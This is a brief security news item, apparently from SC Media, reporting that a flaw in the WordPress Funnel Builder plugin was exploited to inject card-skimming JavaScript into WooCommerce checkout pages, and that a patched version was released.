A critical vulnerability in the WordPress Funnel Builder plugin was actively exploited, allowing attackers to inject malicious JavaScript into WooCommerce checkout pages and steal customer payment information. The flaw, which affects all versions prior to 3.15.0.3, can be exploited without authentication, Bleeping Computer reports.The vulnerability in the Funnel Builder plugin, used by over 40,000 websites, allows unauthenticated attackers to modify global settings via an unprotected checkout endpoint. This enables the injection of arbitrary JavaScript into the plugin's "External Scripts" setting, leading to malicious code execution on every checkout page. Security company Sansec detected the attacks, noting that the payload disguised itself as a legitimate analytics script to establish a WebSocket connection to an attacker-controlled server. This server then delivers a payment card skimmer designed to steal credit card numbers, CVVs, billing addresses, and other customer data.FunnelKit released version 3.15.0.3 to address the vulnerability and recommended that all users update immediately and review their external scripts for any rogue additions.Source: Bleeping Computer
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds




